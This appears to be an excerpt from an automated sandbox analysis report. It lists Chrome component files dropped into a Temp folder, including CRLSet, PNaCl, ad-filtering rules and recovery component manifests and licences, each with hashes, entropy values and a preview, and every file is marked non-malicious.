                                                                                                                                                            Preview:{."update_url": "https://clients2.google.com/service/update2/crx",.. "description": "Portable Native Client Translator Multi-CRX",. "name": "PNaCl Translator Multi-CRX",. "manifest_version": 2,. "minimum_chrome_version": "30.0.0.0",. "version": "0.57.44.2492",. "platforms": [. {. "nacl_arch": "x86-32",. "sub_package_path": "_platform_specific/x86_32/". },. {. "nacl_arch": "x86-64",. "sub_package_path": "_platform_specific/x86_64/". },. {. "nacl_arch": "arm",. "sub_package_path": "_platform_specific/arm/". }. ].}.

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\2508_461848703\LICENSE

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1558
                                                                                                                                                            Entropy (8bit):5.11458514637545
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:OBOCrYJ4rYJVwUCLHDy43HV713XEyMmZ3teTHn:LCrYJ4rYJVwUCHZ3Z13XtdUTH
                                                                                                                                                            MD5:EE002CB9E51BB8DFA89640A406A1090A
                                                                                                                                                            SHA1:49EE3AD535947D8821FFDEB67FFC9BC37D1EBBB2
                                                                                                                                                            SHA-256:3DBD2C90050B652D63656481C3E5871C52261575292DB77D4EA63419F187A55B
                                                                                                                                                            SHA-512:D1FDCC436B8CA8C68D4DC7077F84F803A535BF2CE31D9EB5D0C466B62D6567B2C59974995060403ED757E92245DB07E70C6BDDBF1C3519FED300CC5B9BF9177C
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:// Copyright 2015 The Chromium Authors. All rights reserved..//.// Redistribution and use in source and binary forms, with or without.// modification, are permitted provided that the following conditions are.// met:.//.// * Redistributions of source code must retain the above copyright.// notice, this list of conditions and the following disclaimer..// * Redistributions in binary form must reproduce the above.// copyright notice, this list of conditions and the following disclaimer.// in the documentation and/or other materials provided with the.// distribution..// * Neither the name of Google Inc. nor the names of its.// contributors may be used to endorse or promote products derived from.// this software without specific prior written permission..//.// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS.// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT.// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR.// A PARTICULAR

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\2508_461848703\_metadata\verified_contents.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1511
                                                                                                                                                            Entropy (8bit):5.990470373399214
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:pZRj/flTU3YdElLbkGkjoYFo7aoXwk82/uA4YVFG11hDRTWUsoXrzYYRhn:p/hUId7GB7akluAVVQ/RJskAYRh
                                                                                                                                                            MD5:FDB4229EAFB818A86D28EAE1490D0A06
                                                                                                                                                            SHA1:B4F87B7DD58A05767AE7E9CBB4BF6990131FE128
                                                                                                                                                            SHA-256:978B2719DFBE167FCBC1C6159D13E91742ED75A93966ED1A81000F3677989400
                                                                                                                                                            SHA-512:6A57CA3E63E2C08843E8A7BC11F0965A654377334D0DD488D686D3331846E6131248D039EFCE7D0119CA228ADC0A259EC58D08C0C6071C8CE5ABD49DC1EF0F79
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiJMSUNFTlNFIiwicm9vdF9oYXNoIjoiUGIwc2tBVUxaUzFqWldTQnctV0hIRkltRlhVcExiZDlUcVkwR2ZHSHBWcyJ9LHsicGF0aCI6ImNybC1zZXQiLCJyb290X2hhc2giOiJBV2p2MmVpcFRVNWlkbnRtMG5qdFlFZ096WEx4UndFcW9uUkxRc1dNTDBVIn0seyJwYXRoIjoibWFuaWZlc3QuanNvbiIsInJvb3RfaGFzaCI6IjlRMkE2S1ZwcmVXYlNBXzNJYjVVMG5pbnBJV05ac2F5TUVRWFJQZXd2bGMifV0sImZvcm1hdCI6InRyZWVoYXNoIiwiaGFzaF9ibG9ja19zaXplIjo0MDk2fV0sIml0ZW1faWQiOiJoZm5rcGltbGhoZ2llYWRkZ2ZlbWpob2ZtZmJsbW5pYiIsIml0ZW1fdmVyc2lvbiI6Ijc0MDEiLCJwcm90b2NvbF92ZXJzaW9uIjoxfQ","signatures":[{"header":{"kid":"publisher"},"protected":"eyJhbGciOiJSUzI1NiJ9","signature":"hEfC6uPxx7w3oNCzUcLE8pp96MFdx2x6Z5EAJZZOEwkg9GH1ZrXiCZtdaz2sgCVfy-Sn0H59gnKDQ_wXaUDRV232fhR8QvVPIsSLsj5Yc-cAR9BhW9AmT6OOHmFFdyfPkYmIxqQBkK4r-hov6OMUobvlWO8dZ_dI_rieGNEzWVUm_l489mTNrDqsSVKfGsrTLbD5zp3MXRnfArigVBfuySvuHLNWxlEoWXhb5TuxsmF7Yk-JeIRHJwdF0ibQZIhBJUM

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\2508_461848703\crl-set

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):22050
                                                                                                                                                            Entropy (8bit):7.832574179787835
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:384:s26XPK6MeW3UMWVPHc4m8eWDztoBWbv4g5bk8QzsvFUtrdG9htt/HDsJBr:sfgX4V/JYWntoEv4Kk8SgUrdG/Ps
                                                                                                                                                            MD5:DCE51D4F9B315526B724FE924E1C3C50
                                                                                                                                                            SHA1:8CCE58B7625055FA3997E9C26FAA31DBE9EECCB2
                                                                                                                                                            SHA-256:3DD2C8FE6ADB477CBD3DFF6BE9B296C8467B9AFFB8100F99801B2BA706C179E1
                                                                                                                                                            SHA-512:52103E11BC633F9C5526C36A84E24B02EC46C4C654FA269A2BD1404A85A2956CB1254BAF5CE07E02DABE452C25CDFBB84F3340CEA93AF1E527A4B98653DDB53C
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:".{"Version":0,"ContentType":"CRLSet","Sequence":7401,"DeltaFrom":0,"NumParents":188,"BlockedSPKIs":["Jdoa1Yu/z7In2HI7GFfUwY57qnQXtPnv+TZrXoafizk=","li5LVLuYp+5dX+uWM/mR08MwDpUU2t57DU+CjHlPjoc=","yP3cdcsb27WMB7TqhHKH9iZlndZrwQomrdm1dbOgo40=","BN3pqpp59hSYaCMl+ghwJ2cH+5ypU4QSC0aJMmhJT8k=","tbqN1/iVZMKInT1kU8hJmMd4JJGbZOoINapimGWRvlA=","wO0gU0a7veButWD1zuAqNjTiR0p+ds+PvvVjuxF90OM=","eBpM8ukkUvPuAdDDgaQhTzkEFlw5CtvWH80RJE4Jstw=","/NdsyiNH5c1bOTR/Uc9DZUtpor/JBzZwpr5H2HAebg4=","lo26afv/Fb83YgiUMa3lp+rUt+rxvnACaBC8V9HGT24=","fNKVt1VEgIq9lAlGbwg3xarcAuM7YVDGZE3goJZZ8jw=","9Sk9R+041MMbLULe47WzrOl8omyirANl42Iu6AITH7s=","nFmjzK6kaZhCsGjPxSz5RdtRmGlXyDLNsYynOEn7ue4=","OUz/WJ5okxLPwHHuC8Gf5MYGIWzlQ0Kd5tti5C27O8E=","NuqWEoyJg5+2IfitDh7gucIgb2Kre02ixnZYk8m3ztI=","pqyh7JgJzFtIIf+dKcXr5lGWC5Gx8ZzIm1Xvh4GKlQk=","MO/kE4JHbDOA8C9+I+ZrovhnsFnuHqaHlrRBuFtdElY=","r1kVGOLmxg67/AkHr6pJvEBR1F5/IUq/7nUS7gD2Ye0=","6EnHF2yT32X2S2FpgjZuVmMReBK2+ivAyPqK6u5Bgcw=","0x7DkoW3pTGdAVfbQg7YfHQ+Mzu8d/h3H3BGT0NqYEk=","h7/Yr

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\2508_461848703\manifest.fingerprint

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):66
                                                                                                                                                            Entropy (8bit):3.992877597900004
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:SQxIPAIXPDVQhtLgDQnpyPcz:SQMle7lpucz
                                                                                                                                                            MD5:0CE0488752C657D3562DA0D22CC1ABCC
                                                                                                                                                            SHA1:14860A99E83472E98E48B49F726C0687D9535EBA
                                                                                                                                                            SHA-256:BEE09DDC85BD2DCE5256173F56E912B4548D80AE297859A4A29A3F19A2B9D4B7
                                                                                                                                                            SHA-512:57D11950F678A137E4354C6645C6058B066192D6834426089154C3B4BFEE7E3B7EF8281057A623345ED1AB22B1326A6E84E4A523FB128C8F83A89D6795AB2AE7
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:1.5c1b1c85859d50a3e0df6ff054baa6b8eac25cd45712f6d366307e98699b0c24

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\2508_461848703\manifest.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):191
                                                                                                                                                            Entropy (8bit):4.79478730331306
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:rR6TAulhFphifFJ4Dicn9hFgS1zzHEeSWU4pv/8F/FxLj2RF2fcTZTotL:F6VlMQD+S1sWfB0NpK4aotL
                                                                                                                                                            MD5:933152B3B5CA9FFD684CC0FEABAB98C5
                                                                                                                                                            SHA1:B9CD0FCCC4346ACBCC38A00342A12643C80089BA
                                                                                                                                                            SHA-256:F50D80E8A569ADE59B480FF721BE54D278A7A4858D66C6B230441744F7B0BE57
                                                                                                                                                            SHA-512:EC4ED278B354644AAC96611F1F3F6B7514CB831D250D1A568B2BD6EA4783884F0AD4E395E72DCF2775A0CEAA7D60DED40F88E736210A14D5893F98BCD595FE34
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{. "manifest_version": 2,. "name": "crl-set-8740753273830914504.data",. "version": "7401",. "imageName": "image.squash",. "squash": true,. "fsType": "squashfs",. "isRemovable": false.}

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\2508_525662352\Filtering Rules

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):97968
                                                                                                                                                            Entropy (8bit):5.489893397464442
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:ojHlFMJw9iI9Yh9FHc6cPC3CpBHTrDo630a8Q78xRAQudDv4NZ/p2GuN+BO1:6FMJw9v9efHc6cPCURDR30EYnAQuJANw
                                                                                                                                                            MD5:3846A25BC9191585763E06550798BAB1
                                                                                                                                                            SHA1:F43D903B13AB969E2276E304795CE164F22F893C
                                                                                                                                                            SHA-256:C7D5D133E8F995D3E4D5B68F28BE0D7B1F290DFBD1502E0EC260142325FA8F88
                                                                                                                                                            SHA-512:6B1E1776DE4B4B7D7BD7E6252F555AD84CC689EFE1F3920B3ACFE23DE65212254FC219E0A530037A5EA819894BC2F5B85ECFC0ADDEE9AF3163393AA32F97BA44
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:............0.8.@.R.-728x90...........0.8.@.R.adtdp.com^..........0.8.@.R.yomeno.xyz^.:........*...adcore.com.au..*...adcore.ch..0.8.@.R./adcore_..........0.8.@.R.uwoaptee.com^.8......*...safeway.com0.8.@.R.fwcdn2.com/js/embed-feed.js..........0.8.@.R._468_60..3........0.8.@.R#/wp-content/plugins/wp-super-popup/.9........0.8.@.R)bancodevenezuela.com/imagenes/publicidad/..........0.8.@.R..adbutler-..........0.8.@.R.adrecover.com^..........0.8.@.R.hdbcode.com^.?........*...google.com0.8.@.R!developers.google.com/google-ads/.-........*...konograma.com..0.8.@.R./adserver...........*...vk.com0.8.@.R.vk.me/css/al/ads.css.,........0.8.@.R.mysmth.net/nForum/*/ADAgent_..........0.8.@.R.indoleads.com^.%......0.8.@.R.discordapp.com/banners/.E........*...daum.net0.8.@.R)daumcdn.net/adfit/static/ad-native.min.js.(........0.8.@.R.looker.com/api/internal/.#........0.8.@.R.broadstreetads.com^..........0.8.@.R./banner.cgi?...........*...thefreedictionary.com*...downloads.codefi.re*...windows7themes.net

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\2508_525662352\LICENSE.txt

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):24623
                                                                                                                                                            Entropy (8bit):4.588307081140814
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:384:mva5sf5dXrCN7tnBxpxkepTqzazijFgZk231Py9zD6WApYbm0:mvagXreRnTqzazWgj0v6XqD
                                                                                                                                                            MD5:D33AAA5246E1CE0A94FA15BA0C407AE2
                                                                                                                                                            SHA1:11D197ACB61361657D638154A9416DC3249EC9FB
                                                                                                                                                            SHA-256:1D4FF95CE9C6E21FE4A4FF3B41E7A0DF88638DD449D909A7B46974D3DFAB7311
                                                                                                                                                            SHA-512:98B1B12FF0991FD7A5612141F83F69B86BC5A89DD62FC472EE5971817B7BBB612A034C746C2D81AE58FDF6873129256A89AA8BB7456022246DC4515BAAE2454B
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:EasyList Repository Licences.... Unless otherwise noted, the contents of the EasyList repository.. (https://github.com/easylist) is dual licensed under the GNU General.. Public License version 3 of the License, or (at your option) any later.. version, and Creative Commons Attribution-ShareAlike 3.0 Unported, or.. (at your option) any later version. You may use and/or modify the files.. as permitted by either licence; if required, "The EasyList authors.. (https://easylist.to/)" should be attributed as the source of the.. material. All relevant licence files are included in the repository..... Please be aware that files hosted externally and referenced in the.. repository, including but not limited to subscriptions other than.. EasyList, EasyPrivacy, EasyList Germany and EasyList Italy, may be.. available under other conditions; permission must be granted by the.. respective copyright holders to authorise the use of their material.......Creative Commons Attribut

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\2508_525662352\_metadata\verified_contents.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1529
                                                                                                                                                            Entropy (8bit):5.993915630498445
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:pZRj/flTHYfcl5kYbKqLjeT3azkaoX1pF/kSYYRVHbo0doXxOB6G6QL3foQ3QL5D:p/h4ElBbKdTakak1pFcSfRV7o0dkx8L4
                                                                                                                                                            MD5:6B2EDD2D0C16E5D77BD2C3E4AE88C95F
                                                                                                                                                            SHA1:BC82982FA8A04FA6FD9F17DA03D443A57E0F78D4
                                                                                                                                                            SHA-256:CA0F5F75FC56FBEDA7522B2C83707A451D01760F417C497A37C70554E290B737
                                                                                                                                                            SHA-512:533026A33030795ABF24B6E78D26763734D98CA74BFA4FAC2073EFAD0BB5CA1C38E7036BEAF17E6ABBFE56CF968E80EB3CA3CFD23AEEC10CE1280E8DB1C4078C
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiJGaWx0ZXJpbmcgUnVsZXMiLCJyb290X2hhc2giOiJMTF90X0NkWWRYUnpMSHJBZ3hmUW5tcENTaXlkWEtzVVlJZnZjLTR0czRBIn0seyJwYXRoIjoiTElDRU5TRS50eHQiLCJyb290X2hhc2giOiIyaWswNmk0TFlCdVNHNWphRGFIS253NE9pdnVSRzZsQ0JKMVk0TGtzRFJJIn0seyJwYXRoIjoibWFuaWZlc3QuanNvbiIsInJvb3RfaGFzaCI6Imo4MmhRZGhaa0MwMjFWOEZ1MHUtMExvMnVJdXI5SzdFem5JcHE3WHd2YlkifV0sImZvcm1hdCI6InRyZWVoYXNoIiwiaGFzaF9ibG9ja19zaXplIjo0MDk2fV0sIml0ZW1faWQiOiJnY21qa21nZGxnbmtrY29jbW9laW1pbmFpam1tam5paSIsIml0ZW1fdmVyc2lvbiI6IjkuMzYuMCIsInByb3RvY29sX3ZlcnNpb24iOjF9","signatures":[{"header":{"kid":"publisher"},"protected":"eyJhbGciOiJSUzI1NiJ9","signature":"VM_rIA1uXuXjbhz_uZ8uQp9F3FfgEgGTjCXL08Q_jrGXXH-Yty1DqAw4yzWsadeOjVRozUf_7kBrYJ2U8Y8slircdLRbrqJejQeyyrJx4HFT8qgZEb60YHdsOd76C57YzF5dXErpjT7_FkWA41lTxLQvdWbACMO0DE7uOHO9mZx5pM98Ni9GsM_yxJbRSyDZWa8BdPHErfMuO6YE6D8tbnYTr2tXcMV9p2ZEAFMiso2B-6DSr

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\2508_525662352\manifest.fingerprint

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):66
                                                                                                                                                            Entropy (8bit):3.9458563396006063
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:SWllBTGVn1VJ8U1hRGGpWdTdSATn:SWNT+eKhRR4dTVT
                                                                                                                                                            MD5:991F44CE02222E783A1FEFE4187727CE
                                                                                                                                                            SHA1:9855D1CA0338ADCD5829C3260BF7FAAF88A23509
                                                                                                                                                            SHA-256:58704ADE087671AA1226BC9CEC1719F5B80B90C571EF747812A64458BBEA0F50
                                                                                                                                                            SHA-512:C2616426939B235620A22B24A9BEC6D4F7DBB695C812F1784A4C95B41E53A21F371A6C440177CFABDE47E203EB83269F9013FC75C6D758EA6FDFE7B52B4A554E
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:1.34ff2e9d7a7ce81c5d760d4b0f4b59a0237dd5db0d1e84ccd5103a30687eac17

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\2508_525662352\manifest.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):115
                                                                                                                                                            Entropy (8bit):4.563301657145084
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:rR6TAulhFphifFHXG7LGMdv5HcDKhtUJKS1Avn:F6VlMZWuMt5SKPS1Avn
                                                                                                                                                            MD5:47B89067C397B3EABBD04E6FC4008B71
                                                                                                                                                            SHA1:7B4E623806D7EA8BFCD2FE6836A21E50C9F9340E
                                                                                                                                                            SHA-256:8FCDA141D859902D36D55F05BB4BBED0BA36B88BABF4AEC4CE7229ABB5F0BDB6
                                                                                                                                                            SHA-512:FDA1CE8EB24A05F65E8132248EEF96C422E5AA2D3254B590FBFD3FCB2016E3B7F6E4B53702D88E1695D4BEC0175F72EB4256CDAA2FF72DDF4390D480D04BA373
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{. "manifest_version": 2,. "name": "Subresource Filtering Rules",. "ruleset_format": 1,. "version": "9.36.0".}.

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\2508_584457100\Recovery.crx3

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:Google Chrome extension, version 3
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):145035
                                                                                                                                                            Entropy (8bit):7.995615725071868
                                                                                                                                                            Encrypted:true
                                                                                                                                                            SSDEEP:3072:TdgEhmDf+E8VY0x81Rkc6L2oqzqkPEu30gZlc3G2ZknF:TyEhmDf+/+Fnkj6lEukgZyyF
                                                                                                                                                            MD5:EA1C1FFD3EA54D1FB117BFDBB3569C60
                                                                                                                                                            SHA1:10958B0F690AE8F5240E1528B1CCFFFF28A33272
                                                                                                                                                            SHA-256:7C3A6A7D16AC44C3200F572A764BCE7D8FA84B9572DD028B15C59BDCCBC0A77D
                                                                                                                                                            SHA-512:6C30728CAC9EAC53F0B27B7DBE2222DA83225C3B63617D6B271A6CFEDF18E8F0A8DFFA1053E1CBC4C5E16625F4BBC0D03AA306A946C9D72FAA4CEB779F8FFCAF
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:Cr24..............0.."0...*.H.............0...........\7c.<........Fto.8.2'5..qk...%....2...C.F.9.#..e.xQ.......[...L|....3>/....u.:T.7...(.yM...?V.<?........1.a...O?d.....A.H..'.MpB..T.m..Vn Ip..>k.|1..n.<Fb..f..*Q1.....s..2..{*.6....Pp....obM..1.......b1.......(.u^.'z......v.F.W.X4."-*eu...b..........S'.....2.{.....'....+.'.."..Y.x.ISa...)....H.&92..?!..~..F.5."...n,.B.-|\.)..(..... ]G..j.-M)....C......o&L..0.K.....UtP.&.N...;..^w/a{)v...~KG;...?.1...k.c..D.U......J.6.`.G.5.x.k..[...i.A.@I^..I.<A. J...j.'.G.`.$q.N..Tdq]2]p.OF..#.#......'....8.3......0.."0...*.H.............0.............O..(...':19..O/.>....=.....m.n\.z..q.....JW..F......+H.Z+KGO.9....8.....U...&.y....,$...?.Eo.....\f/.Z..+M8...B.3'..Y.r...X.AS?.~..k..n....... Z...&.G....."n..........l.0v.x#<....Lx,-.w..-..d.....J.pT..('e~*{%kQ.Q......rI.....Z....v.N.....J.d_......rX.......w@.b.[.c../V.'c...!.~.k..}z...U.S..nC......@.......Y..#.D.z.....5&.1O...X=p..2.F..P.6yP..>{.....HBX.*.E5....y..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\2508_584457100\_metadata\verified_contents.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1765
                                                                                                                                                            Entropy (8bit):6.027545161275716
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:p/hii6zkvVI1Jip2qRNHvakuQkCNFxdsGwmBKkgum91:Rz0kv6cNvaYNFwSEhug
                                                                                                                                                            MD5:45821E6EB1AEC30435949B553DB67807
                                                                                                                                                            SHA1:B3CADEB17FE5B76B5DBB428B8D3A07B341F8B1BC
                                                                                                                                                            SHA-256:E5FAE91295BECF7F66BFA4BE1061CA5537ED763EB5D01485F23ECFB583304FEE
                                                                                                                                                            SHA-512:BCBE40CAFAA4B14566D91E361D8FB7F0288D5C459FA478AA4C575444DA4D406E1076FC0B3A31D4A9E5EE034F0FE15A0EFE8A8A52B838DE94B96D3E488D28F0FE
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiJSZWNvdmVyeS5jcngzIiwicm9vdF9oYXNoIjoiaGdCR051SzhNR2NKaDlfNmZQaFdEWmpVYUFKeklzeDlJS21DUEZvb0dfUSJ9LHsicGF0aCI6Im1hbmlmZXN0Lmpzb24iLCJyb290X2hhc2giOiIwYXduVFBFQmdDRHkyV05hVVk3Um9mSWN3c3ZwNHFRNUxzZVMxVXRiVXY0In1dLCJmb3JtYXQiOiJ0cmVlaGFzaCIsImhhc2hfYmxvY2tfc2l6ZSI6NDA5Nn1dLCJpdGVtX2lkIjoiaWhubGNlbm9jZWhnZGFlZ2RtaGJpZGpobmhkY2hmbW0iLCJpdGVtX3ZlcnNpb24iOiIxLjMuMzYuMTQxIiwicHJvdG9jb2xfdmVyc2lvbiI6MX0","signatures":[{"header":{"kid":"publisher"},"protected":"eyJhbGciOiJSUzI1NiJ9","signature":"iFuMX_kOZ-zJ7KVu6Lxb3rHWZgQvkZhv25x_SGlBiDV_okALrGbj6rUOWyNNNsHXMnT118XZmA696XR8qkr4dwT5Gvez-9gi-WYBY7XBkgo7v6NspGgJF89BNCeI-P9k-zBHOGgrf-fCEiAcoM7xCx9_f8qlRy7nhQPyjOIHn5eEJEir0uSu6gdqR9afnVZ3UoR-VOLdOBt7fA4ee38MP2ut5qWU50F5dvIezfKkTVDMHwztvcLCy6R9SVkdSYv6jwWGccYRl-aclvkkHu6SnbZGI7fmDZdkcBAxBHYEZZMmvb76ro4SO15GDyEVAo_Qf4trdrY_GyN_Bm73imCTjgtoGc

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\2508_584457100\manifest.fingerprint

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):66
                                                                                                                                                            Entropy (8bit):3.7900469623255675
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:SpOXzxlQ4BdPWfDL9c:SpOjDQFfVc
                                                                                                                                                            MD5:2AE14F91312C4E8034366B09D49D5B18
                                                                                                                                                            SHA1:AD4933A5D838D0FA0B960C327A5039A9E8249642
                                                                                                                                                            SHA-256:4F122332EF0F2BB490EF59619D3602C1A7277C0A7A19C132202DB4803A09BFA2
                                                                                                                                                            SHA-512:FB0CC467A4B8463F6A3BF42CDC11C23B34EB94A9397644B68714DCB819EE326BAE05022D59D23DC9907DF1E6928064D853FD0900BB6083417892D4D5A9BA7716
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:1.aeedb246d19256a956fedaa89fb62423ae5bd8855a2a1f3189161cf045645a19

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\2508_584457100\manifest.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):195
                                                                                                                                                            Entropy (8bit):4.682333395896383
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:rR6TAulhFphifFJ9LAG9Xg0XTFHqS1wP/pEeSWU4pv/8F/FxLj2RF2fcTZTotL:F6VlM90ggITgS1wnuWfB0NpK4aotL
                                                                                                                                                            MD5:7A8E3A0B6417948DF4D49F3915428D7A
                                                                                                                                                            SHA1:4FC084AABDB13483567D5C417C7ED8FD16726A80
                                                                                                                                                            SHA-256:D1AC274CF1018020F2D9635A518ED1A1F21CC2CBE9E2A4392EC792D54B5B52FE
                                                                                                                                                            SHA-512:064D84A57B28C19AD10742859DA493D0826B47ADC632F6C623DFB4DE36D72A9D29BE98518061A9FFD42D99FCF01F27DE39CE74782B3A5ACBBE11DFDDEEAB59A1
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{. "manifest_version": 2,. "name": "ImprovedRecoveryComponentInner",. "version": "1.3.36.141",. "imageName": "image.squash",. "squash": true,. "fsType": "squashfs",. "isRemovable": false.}

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\2508_821393512\_metadata\verified_contents.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1765
                                                                                                                                                            Entropy (8bit):6.016932513650603
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:p/hKAGj0FnAp7XgNGIaku9E5tPJXaWqkbszesM:R5Gj0FAlsaBmfPsRD3M
                                                                                                                                                            MD5:6D1D175F88B64546105E3E7C31D1129A
                                                                                                                                                            SHA1:75A1B56F55BB62B05365A0FDBFC7941DE77CBFAF
                                                                                                                                                            SHA-256:A0BC246E8E160A9BB32FA60F4E7A04D148A17125F426509466031E07731FDF81
                                                                                                                                                            SHA-512:5C80908331E30C7EAD67F7F6C5AB064B07626FD9C58925A0D2124D66B25C5AE2F218BDACFB68AFCB332E88EB297CFB7E0A7A9E5E1E54C9B7A510FEF095F9B54F
                                                                                                                                                            Malicious:false
